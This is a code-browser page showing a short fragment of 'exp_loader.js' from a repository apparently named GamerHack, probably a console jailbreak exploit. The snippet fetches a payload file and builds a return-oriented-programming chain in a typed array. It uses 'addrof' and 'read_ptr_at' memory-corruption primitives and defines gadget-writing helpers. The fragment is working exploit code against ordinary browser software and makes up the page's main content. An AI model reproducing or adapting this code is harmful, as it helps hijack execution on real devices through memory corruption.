MCPcopy Create free account
hub / github.com/GamerHack/GamerHack.github.io / set_gadget

Function set_gadget

restore/672/exp_loader.js:4–4  ·  view source on GitHub ↗
(val)

Source from the content-addressed store, hash-verified

2var xhr=new XMLHttpRequest();xhr.responseType="arraybuffer";xhr.open("GET", PLfile, true);xhr.send();
3function load_payload(){
4var ropchain_array = new Uint32Array(55002);var ropchain = read_ptr_at(addrof(ropchain_array)+0x10);var ropchain_offset = 2;function set_gadget(val){ropchain_array[ropchain_offset++] = val | 0;ropchain_array[ropchain_offset++] = (val / 4294967296) | 0;}
5function set_gadgets(l){for(var i = 0; i < l.length; i++)set_gadget(l[i]);}
6function db(data){for(var i = 0; i < data.length; i++)ropchain_array[ropchain_offset++] = data[i];}
7var main_ret = malloc(8);

Callers 2

set_gadgetsFunction · 0.70
load_payloadFunction · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected